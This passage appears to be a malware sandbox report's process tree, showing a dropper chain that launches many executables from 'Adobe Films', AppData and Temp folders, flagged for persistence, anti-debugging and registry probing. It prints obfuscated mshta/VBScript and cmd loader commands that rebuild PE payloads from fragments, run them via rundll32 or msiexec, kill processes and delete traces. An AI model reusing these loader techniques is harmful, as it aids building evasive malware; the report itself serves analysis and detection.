C:\Users\Admin\Pictures\Adobe Films\_WjLopI0SGjVoK1vv4RABWvT.exe"C:\Users\Admin\Pictures\Adobe Films\_WjLopI0SGjVoK1vv4RABWvT.exe"8⤵
- Executes dropped EXE
PID:2148
-
-
C:\Users\Admin\Pictures\Adobe Films\_WjLopI0SGjVoK1vv4RABWvT.exe"C:\Users\Admin\Pictures\Adobe Films\_WjLopI0SGjVoK1vv4RABWvT.exe"8⤵
- Executes dropped EXE
PID:6456
-
-
-
C:\Users\Admin\Pictures\Adobe Films\M6jzD4DsN636MdsrSCLyMxNK.exe"C:\Users\Admin\Pictures\Adobe Films\M6jzD4DsN636MdsrSCLyMxNK.exe"7⤵PID:5824
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5824 -s 2808⤵
- Program crash
PID:6884
-
-
-
C:\Users\Admin\Pictures\Adobe Films\SS9XSoZmzR6yTxeWosrHLE5V.exe"C:\Users\Admin\Pictures\Adobe Films\SS9XSoZmzR6yTxeWosrHLE5V.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3248 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Loads dropped DLL
- Adds Run key to start application
PID:5492 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"9⤵PID:7636
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x214,0x218,0x21c,0x1f0,0x220,0x7ff86f36dec0,0x7ff86f36ded0,0x7ff86f36dee010⤵PID:8916
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff6a57f9e70,0x7ff6a57f9e80,0x7ff6a57f9e9011⤵PID:8768
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1728,2548857345635655658,17593232224503436592,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7636_1137790179" --mojo-platform-channel-handle=1792 /prefetch:810⤵PID:2656
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1728,2548857345635655658,17593232224503436592,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7636_1137790179" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1744 /prefetch:210⤵PID:5524
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\LtPGrXM6HcaPC22YEKYV8Nfi.exe"C:\Users\Admin\Pictures\Adobe Films\LtPGrXM6HcaPC22YEKYV8Nfi.exe"7⤵
- Executes dropped EXE
PID:2432 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 2768⤵
- Program crash
- Enumerates system info in registry
PID:3044
-
-
-
C:\Users\Admin\Pictures\Adobe Films\D_BLDnDHu_TD3iz9CSGyBFPI.exe"C:\Users\Admin\Pictures\Adobe Films\D_BLDnDHu_TD3iz9CSGyBFPI.exe"7⤵
- Executes dropped EXE
PID:6156
-
-
C:\Users\Admin\Pictures\Adobe Films\D889cNcc5Y_B8MT1CZoqotRj.exe"C:\Users\Admin\Pictures\Adobe Films\D889cNcc5Y_B8MT1CZoqotRj.exe"7⤵
- Executes dropped EXE
PID:5816 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 3368⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6240
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xf7rCbRH4pGRa62Ofza35vUU.exe"C:\Users\Admin\Pictures\Adobe Films\xf7rCbRH4pGRa62Ofza35vUU.exe"7⤵
- Executes dropped EXE
PID:6832 -
C:\Users\Admin\AppData\Roaming\Underdress.exeC:\Users\Admin\AppData\Roaming\Underdress.exe8⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6884 -
C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"9⤵PID:7060
-
-
-
C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exeC:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:6892 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"9⤵PID:1416
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\eE5C0JFpVRfv_DCeuMEdyY5r.exe"C:\Users\Admin\Pictures\Adobe Films\eE5C0JFpVRfv_DCeuMEdyY5r.exe"7⤵PID:2012
-
-
C:\Users\Admin\Pictures\Adobe Films\54p61i9IToLUgwDR5Xc2JSXD.exe"C:\Users\Admin\Pictures\Adobe Films\54p61i9IToLUgwDR5Xc2JSXD.exe"7⤵PID:6920
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"8⤵PID:6100
-
C:\Users\Admin\AppData\Local\3839976.exe"C:\Users\Admin\AppData\Local\3839976.exe"9⤵PID:2272
-
-
C:\Users\Admin\AppData\Local\8588289.exe"C:\Users\Admin\AppData\Local\8588289.exe"9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7848
-
-
C:\Users\Admin\AppData\Local\8736505.exe"C:\Users\Admin\AppData\Local\8736505.exe"9⤵PID:8248
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\8736505.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\8736505.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))10⤵PID:2092
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\8736505.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Local\8736505.exe" ) do taskkill -f -Im "%~NXZ"11⤵PID:7008
-
C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i12⤵PID:8596
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))13⤵PID:8588
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"14⤵PID:9100
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ).RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )13⤵PID:6248
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i &CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K &Del /Q *14⤵PID:1796
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"15⤵PID:5388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "15⤵PID:7020
-
-
C:\Windows\SysWOW64\control.execontrol ..\WfNRfms4.K15⤵PID:1252
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\WfNRfms4.K16⤵
- Loads dropped DLL
PID:5076 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\WfNRfms4.K17⤵PID:6432
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\WfNRfms4.K18⤵
- Loads dropped DLL
PID:2664
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -Im "8736505.exe"12⤵
- Kills process with taskkill
PID:7636
-
-
-
-
-
C:\Users\Admin\AppData\Local\2208308.exe"C:\Users\Admin\AppData\Local\2208308.exe"9⤵
- Suspicious behavior: SetClipboardViewer
PID:9052
-
-
C:\Users\Admin\AppData\Local\4140920.exe"C:\Users\Admin\AppData\Local\4140920.exe"9⤵PID:8756
-
-
-
C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"8⤵PID:2200
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 2969⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7892
-
-
-
C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"8⤵PID:5056
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵PID:1312
-
C:\Users\Admin\AppData\Local\Temp\is-BERNV.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-BERNV.tmp\setup.tmp" /SL5="$2039C,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"9⤵PID:6060
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT10⤵PID:6636
-
C:\Users\Admin\AppData\Local\Temp\is-TAIG8.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-TAIG8.tmp\setup.tmp" /SL5="$40416,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT11⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:7872 -
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart12⤵PID:8812
-
C:\c80b4ce618f2b22e9b\Setup.exeC:\c80b4ce618f2b22e9b\\Setup.exe /q /norestart /x86 /x64 /web13⤵
- Loads dropped DLL
- Checks processor information in registry
PID:2948
-
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss112⤵PID:8804
-
-
C:\Users\Admin\AppData\Local\Temp\is-EKSL5.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-EKSL5.tmp\postback.exe" ss112⤵PID:8748
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"8⤵PID:6708
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵PID:6784
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"10⤵PID:7548
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"11⤵
- Kills process with taskkill
PID:6076
-
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵PID:6684
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )12⤵PID:3460
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵PID:2468
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5628
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )12⤵PID:8080
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC13⤵PID:3740
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵PID:7688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵PID:5432
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵PID:4680
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"8⤵PID:1364
-
-
C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"8⤵PID:6176
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6176 -s 17529⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4540
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
PID:5984 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 2969⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1052
-
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"8⤵PID:6972
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
PID:2644 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"10⤵PID:2824
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"8⤵PID:7496
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7496 -s 19529⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8636
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"8⤵PID:8104
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"8⤵PID:1064
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1064 -s 19689⤵
- Program crash
PID:4732
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1064 -s 19689⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8696
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IjhdP4nV_bnmATIamZ0oM7vu.exe"C:\Users\Admin\Pictures\Adobe Films\IjhdP4nV_bnmATIamZ0oM7vu.exe"7⤵
- Drops file in Program Files directory
PID:6976 -
C:\Users\Admin\Documents\J93t50WbZcEhobrEuzxKPi4w.exe"C:\Users\Admin\Documents\J93t50WbZcEhobrEuzxKPi4w.exe"8⤵PID:7588
-
C:\Users\Admin\Pictures\Adobe Films\CPxLcn3HuVhrSf5EK9J2XoM6.exe"C:\Users\Admin\Pictures\Adobe Films\CPxLcn3HuVhrSf5EK9J2XoM6.exe"9⤵PID:2200
-
-
C:\Users\Admin\Pictures\Adobe Films\eKOUrhDqulq3zBw4nSBt_xFz.exe"C:\Users\Admin\Pictures\Adobe Films\eKOUrhDqulq3zBw4nSBt_xFz.exe"9⤵PID:8960
-
-
C:\Users\Admin\Pictures\Adobe Films\w_NTBuKInq4mhHVl5osl1CHj.exe"C:\Users\Admin\Pictures\Adobe Films\w_NTBuKInq4mhHVl5osl1CHj.exe"9⤵PID:8924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8924 -s 27610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5316
-
-
-
C:\Users\Admin\Pictures\Adobe Films\H5g745DD4zaGI4veDHXuzIg9.exe"C:\Users\Admin\Pictures\Adobe Films\H5g745DD4zaGI4veDHXuzIg9.exe"9⤵
- Loads dropped DLL
PID:9208 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
PID:5360 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"11⤵
- Suspicious use of FindShellTrayWindow
PID:6540 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff86f36dec0,0x7ff86f36ded0,0x7ff86f36dee012⤵PID:6464
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=2256 /prefetch:812⤵PID:4728
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=2244 /prefetch:812⤵PID:6036
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1624 /prefetch:212⤵PID:5996
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2556 /prefetch:112⤵PID:6188
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2576 /prefetch:112⤵PID:7116
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=2948 /prefetch:812⤵PID:6628
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3192 /prefetch:212⤵
- Modifies registry class
PID:7896
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=2032 /prefetch:812⤵PID:4060
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=3364 /prefetch:812⤵PID:2488
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=1512 /prefetch:812⤵PID:7088
-
-
